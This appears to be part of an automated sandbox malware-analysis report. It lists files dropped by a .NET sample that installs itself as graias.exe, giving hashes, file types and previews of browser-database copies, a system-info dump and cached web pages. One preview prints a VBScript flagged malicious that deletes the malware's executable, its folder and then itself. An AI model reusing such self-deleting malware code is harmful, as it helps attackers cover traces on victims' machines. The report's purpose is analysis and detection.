                                                                                                                                                                                                                                          SHA-256:4C764E2DF9F41B915772A2259A958DB29E6476693225882D1FBAE286C22AFB41
                                                                                                                                                                                                                                          SHA-512:75C78BF6271DBDFE3A044ADF75F84AF49867E63BD614F0A300A676A73A736432C16C2DA686177B01E01BE6018178CCD060FB009DA012AD876BFD632833046A0C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:n..y... ...................':...{........................Z.....9....{S......{w.h.\.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...................................H......{w.................2.G......{w..........................#......h.\.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\chpC919.tmp

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\chpC949.tmp

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Qn:Qn
                                                                                                                                                                                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\sysinfo.txt

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):83964
                                                                                                                                                                                                                                          Entropy (8bit):5.188571918391598
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:768:QP9UpyBAyBjl6UhPJgG6ofJvV7lV6EMR5uX3l0hG6NUVPkNEr+aL/FkJOlKwY0:QD3VP6muR2gUeOu0
                                                                                                                                                                                                                                          MD5:C07F7DE7E42D289AF493F73A6E8B10ED
                                                                                                                                                                                                                                          SHA1:545FA4175045C0960E750D1E03E5330CFEBF78B5
                                                                                                                                                                                                                                          SHA-256:76667BFCFC739EB9FC89837608EB0BE4A11E995E181A245840230E829F49529A
                                                                                                                                                                                                                                          SHA-512:A8D049FF6AF1CB1E8F942106E41976DD28C48BE96220D50E03F7DA3F6E260B8E0E83C042EE8822FF3B232BC58E6BCFE84A46302CE4BDFD59D2A3C769B3ECA49E
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:------------------..System Information..------------------.. Time of this report: 1/3/2025, 18:02:34.. Machine name: 783875.. Machine Id: Unknown.. Operating System: Windows 10 Pro 64-bit (10.0, Build 19045) (19041.vb_release.191206-1406).. Language: English (Regional Setting: English).. System Manufacturer: FwOzYOUKbAaU2RD.. System Model: eSZX 9p9.. BIOS: VMW201.00V.20829224.B64.2211211842 (type: UEFI).. Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 CPUs), ~2.0GHz.. Memory: 8192MB RAM.. Available OS Memory: 8192MB RAM.. Page File: 2467MB used, 5723MB available.. Windows Dir: C:\Windows.. DirectX Version: DirectX 12.. DX Setup Parameters: Not found.. User DPI Setting: 96 DPI (100 percent).. System DPI Setting: 96 DPI (100 percent).. DWM DPI Scaling: Disabled.. Miracast: N

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):626
                                                                                                                                                                                                                                          Entropy (8bit):3.435185090535513
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:xQ4lA2++ugypjBQMPURbRKMJV62Q3DoRKMJV629HPoRKMJVo/0aimi:7a2+SDdrr62QTorr629vorrhait
                                                                                                                                                                                                                                          MD5:771DE7523AB6947394C64CFD5BBB3B99
                                                                                                                                                                                                                                          SHA1:CCD78BE7B23A93DF03CCC675B4E1A60EEB13B276
                                                                                                                                                                                                                                          SHA-256:25AD41ACE65051280FE9743DB008A160CA8442069BE38224CE862094EEDC314B
                                                                                                                                                                                                                                          SHA-512:CB13EC679DA933FEF28079EDA4EECA5DD029B6556D5F9C9C8E34E3EE7224C2682F0B817B667A7FDA9D04B612A01A4D7767CEB0CF2687111E162E24F61472890B
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Preview:O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...w.h.i.l.e. .f.s.o...F.i.l.e.E.x.i.s.t.s.(.".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.G.r.a.i.a.s.\.g.r.a.i.a.s...e.x.e.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.G.r.a.i.a.s.\.g.r.a.i.a.s...e.x.e."...w.e.n.d...f.s.o...D.e.l.e.t.e.F.o.l.d.e.r. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.G.r.a.i.a.s."...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Graias\graias.exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\iGhDjzEiDU.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):983040
                                                                                                                                                                                                                                          Entropy (8bit):7.849370824950313
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24576:GzrpUdcKiEWIXZ4aQJkf1dedJNxkTeGnAoEe:cpKiEWIJ4aWkfjedxkTeGAo9
                                                                                                                                                                                                                                          MD5:7CAF240DB905F259197CF71B03ACF888
                                                                                                                                                                                                                                          SHA1:D8D9726A0A67795A01FED368055D9315FEADA3FD
                                                                                                                                                                                                                                          SHA-256:C8017F526793DD8B6B6E98BFA9847FCF3AA7C4096A8432719A8324E06BA8C088
                                                                                                                                                                                                                                          SHA-512:1F9464E14D33BFAB44DFC85486BEA31126A26929E04EAE1159E6ECC886AA79877CA29AA93E614512625000D153E090C06B3B2081F9CBC1E8997AD26E59097255
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Qrg..............0......4........... ........@.. .......................`............`.................................t...O........1...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....1.......2..................@..@.reloc.......@......................@..B........................H........D..T0..........<u..8s...........................................0............}......}......}.....(.......(......{.....r...pr...p~9...%-.&~8.........s....%.9...(...+(...+~:...%-.&~8...../...s....%.:...(...+...5...%..(...+s.....%.r...p.%.r#..p...6...(....r5..p ............%...%...(......{....o....&*..0..H.........{....o ...r...po!.....,..rS..p("...&.{....o....&8.....{....o ...r...po!.....,..r{..p("...&.{....o....&8.....{....o#........,....{.....X}.....+....}.....s.....

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Graias\graias.exe:Zone.Identifier

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\iGhDjzEiDU.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                                          Chrome Cache Entry: 151

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):13339
                                                                                                                                                                                                                                          Entropy (8bit):7.683569563478597
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                                                          MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                                                          SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                                                          SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                                                          SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

                                                                                                                                                                                                                                          Chrome Cache Entry: 152

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1432
                                                                                                                                                                                                                                          Entropy (8bit):4.986131881931089
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                                                                          MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                                                                          SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                                                                          SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                                                                          SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &

                                                                                                                                                                                                                                          Chrome Cache Entry: 153

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):18367
                                                                                                                                                                                                                                          Entropy (8bit):7.7772261735974215
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                                                                          MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                                                                          SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                                                                          SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                                                                          SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

                                                                                                                                                                                                                                          Chrome Cache Entry: 154

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1154
                                                                                                                                                                                                                                          Entropy (8bit):4.59126408969148
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                                                                          MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                                                                          SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                                                                          SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                                                                          SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

                                                                                                                                                                                                                                          Chrome Cache Entry: 155

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):3130
                                                                                                                                                                                                                                          Entropy (8bit):4.790069981348324
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                                                                          MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                                                                          SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                                                                          SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                                                                          SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/

                                                                                                                                                                                                                                          Chrome Cache Entry: 156

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):15427
                                                                                                                                                                                                                                          Entropy (8bit):7.784472070227724
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                                                          MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                                                          SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                                                          SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                                                          SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

                                                                                                                                                                                                                                          Chrome Cache Entry: 157

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):47062
                                                                                                                                                                                                                                          Entropy (8bit):5.016149588804727
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:768:haAq16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTKGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                                                                                          MD5:1FF4CE3C1DB69A5146B03AD8BE62F5EB
                                                                                                                                                                                                                                          SHA1:5D177F6D11FCFF2BD62E61983383BB39D9F045E4
                                                                                                                                                                                                                                          SHA-256:222F320F99EF710DCE98F125314F30DAC99CF408525D86F185B317A878D48A5C
                                                                                                                                                                                                                                          SHA-512:36D198120D83AA9BDC2E74F80B99E2219EE4F03A8DD93A1E58A9E30BD48E829E5220A9F5FE6FC29B3810ED85005A8DCD0EAD04EE06DCCD0A15CD6D080E88641D
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st

                                                                                                                                                                                                                                          Chrome Cache Entry: 158

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                          Entropy (8bit):3.875
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:HMB:k
                                                                                                                                                                                                                                          MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                                                                                          SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
